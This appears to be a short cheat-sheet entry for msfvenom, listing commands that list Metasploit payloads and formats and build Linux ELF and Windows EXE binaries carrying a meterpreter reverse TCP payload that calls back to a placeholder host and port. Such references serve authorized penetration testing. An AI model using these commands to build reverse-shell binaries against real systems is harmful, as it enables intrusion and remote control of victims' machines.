Skip to main content

Manually generate payloads for metasploit.

# To list payloads:
msfvenom -l payloads

# To list formats:
msfvenom -l formats

# To show payload options:
msfvenom -p <payload> --list-options

# To create an ELF binary with a reverse TCP handler:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> -f elf > <path/to/binary>

# To create an EXE binary with a reverse TCP handler:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> -f exe > <path/to/binary.exe>